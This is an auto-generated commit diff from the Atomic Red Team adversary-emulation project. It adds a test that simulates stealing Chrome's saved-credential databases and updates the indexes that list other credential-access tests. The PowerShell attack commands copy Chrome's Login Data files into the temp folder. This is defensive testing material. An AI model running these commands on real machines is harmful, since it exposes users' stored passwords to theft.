Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

This commit is contained in:
CircleCI Atomic Red Team doc generator
2021-09-15 02:11:02 +00:00
parent 358124ee2d
commit 2a6a82f945
6 changed files with 84 additions and 0 deletions
+1
@@ -21,6 +21,7 @@ credential-access,T1555,Credentials from Password Stores,5,Enumerate credentials
credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
credential-access,T1555.003,Credentials from Web Browsers,4,Simulating access to Chrome Login Data,3d111226-d09a-4911-8715-fe11664f960d,powershell
credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
credential-access,T1003.006,DCSync,1,DCSync (Active Directory),129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
21 credential-access T1555.003 Credentials from Web Browsers 1 Run Chrome-password Collector 8c05b133-d438-47ca-a630-19cc464c4622 powershell
22 credential-access T1555.003 Credentials from Web Browsers 2 Search macOS Safari Cookies c1402f7b-67ca-43a8-b5f3-3143abedc01b sh
23 credential-access T1555.003 Credentials from Web Browsers 3 LaZagne - Credentials from Browser 9a2915b3-3954-4cce-8c76-00fbf4dbd014 command_prompt
24 credential-access T1555.003 Credentials from Web Browsers 4 Simulating access to Chrome Login Data 3d111226-d09a-4911-8715-fe11664f960d powershell
25 credential-access T1552.002 Credentials in Registry 1 Enumeration for Credentials in Registry b6ec082c-7384-46b3-a111-9a9b8b14e5e7 command_prompt
26 credential-access T1552.002 Credentials in Registry 2 Enumeration for PuTTY Credentials in Registry af197fd7-e868-448e-9bd5-05d1bcd9d9e5 command_prompt
27 credential-access T1003.006 DCSync 1 DCSync (Active Directory) 129efd28-8497-4c87-a1b0-73b9a870ca3e command_prompt
@@ -10,6 +10,7 @@ credential-access,T1555,Credentials from Password Stores,4,Enumerate credentials
credential-access,T1555,Credentials from Password Stores,5,Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials],bc071188-459f-44d5-901a-f8f2625b2d2e,powershell
credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
credential-access,T1555.003,Credentials from Web Browsers,4,Simulating access to Chrome Login Data,3d111226-d09a-4911-8715-fe11664f960d,powershell
credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
credential-access,T1003.006,DCSync,1,DCSync (Active Directory),129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
10 credential-access T1555 Credentials from Password Stores 5 Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials] bc071188-459f-44d5-901a-f8f2625b2d2e powershell
11 credential-access T1555.003 Credentials from Web Browsers 1 Run Chrome-password Collector 8c05b133-d438-47ca-a630-19cc464c4622 powershell
12 credential-access T1555.003 Credentials from Web Browsers 3 LaZagne - Credentials from Browser 9a2915b3-3954-4cce-8c76-00fbf4dbd014 command_prompt
13 credential-access T1555.003 Credentials from Web Browsers 4 Simulating access to Chrome Login Data 3d111226-d09a-4911-8715-fe11664f960d powershell
14 credential-access T1552.002 Credentials in Registry 1 Enumeration for Credentials in Registry b6ec082c-7384-46b3-a111-9a9b8b14e5e7 command_prompt
15 credential-access T1552.002 Credentials in Registry 2 Enumeration for PuTTY Credentials in Registry af197fd7-e868-448e-9bd5-05d1bcd9d9e5 command_prompt
16 credential-access T1003.006 DCSync 1 DCSync (Active Directory) 129efd28-8497-4c87-a1b0-73b9a870ca3e command_prompt
@@ -35,6 +35,7 @@
- Atomic Test #1: Run Chrome-password Collector [windows]
- Atomic Test #2: Search macOS Safari Cookies [macos]
- Atomic Test #3: LaZagne - Credentials from Browser [windows]
- Atomic Test #4: Simulating access to Chrome Login Data [windows]
- [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md)
- Atomic Test #1: Enumeration for Credentials in Registry [windows]
- Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
@@ -20,6 +20,7 @@
- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #1: Run Chrome-password Collector [windows]
- Atomic Test #3: LaZagne - Credentials from Browser [windows]
- Atomic Test #4: Simulating access to Chrome Login Data [windows]
- [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md)
- Atomic Test #1: Enumeration for Credentials in Registry [windows]
- Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
+28
@@ -1412,6 +1412,34 @@ credential-access:
name: command_prompt
elevation_required: true
command: "#{lazagne_path} browsers\n"
- name: Simulating access to Chrome Login Data
auto_generated_guid: 3d111226-d09a-4911-8715-fe11664f960d
description: "Simulates an adversary accessing encrypted credentials from Google
Chrome Login database. \n"
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'Chrome must be installed
'
prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe")
-Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"))
{exit 0} else {exit 1}
get_prereq_command: |
$installer = "$env:temp\ChromeStandaloneSetup64.msi"
Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.msi https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi
msiexec /i $installer /qn
Start-Process -FilePath "chrome.exe"
Stop-Process -Name "chrome"
executor:
name: powershell
command: |
Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data" -Destination $env:temp
Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data For Account" -Destination $env:temp
cleanup_command: |
Remove-Item -Path "$env:temp\Login Data" -Force -ErrorAction Ignore
Remove-Item -Path "$env:temp\Login Data For Account" -Force -ErrorAction Ignore
T1552.002:
technique:
created: '2020-02-04T12:58:40.678Z'
+52
@@ -18,6 +18,8 @@ After acquiring credentials from web browsers, adversaries may attempt to recycl
- [Atomic Test #3 - LaZagne - Credentials from Browser](#atomic-test-3---lazagne---credentials-from-browser)
- [Atomic Test #4 - Simulating access to Chrome Login Data](#atomic-test-4---simulating-access-to-chrome-login-data)
<br/>
@@ -158,4 +160,54 @@ Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/2.4.
<br/>
<br/>
## Atomic Test #4 - Simulating access to Chrome Login Data
Simulates an adversary accessing encrypted credentials from Google Chrome Login database.
**Supported Platforms:** Windows
**auto_generated_guid:** 3d111226-d09a-4911-8715-fe11664f960d
#### Attack Commands: Run with `powershell`!
```powershell
Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data" -Destination $env:temp
Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data For Account" -Destination $env:temp
```
#### Cleanup Commands:
```powershell
Remove-Item -Path "$env:temp\Login Data" -Force -ErrorAction Ignore
Remove-Item -Path "$env:temp\Login Data For Account" -Force -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Chrome must be installed
##### Check Prereq Commands:
```powershell
if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
$installer = "$env:temp\ChromeStandaloneSetup64.msi"
Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.msi https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi
msiexec /i $installer /qn
Start-Process -FilePath "chrome.exe"
Stop-Process -Name "chrome"
```
<br/>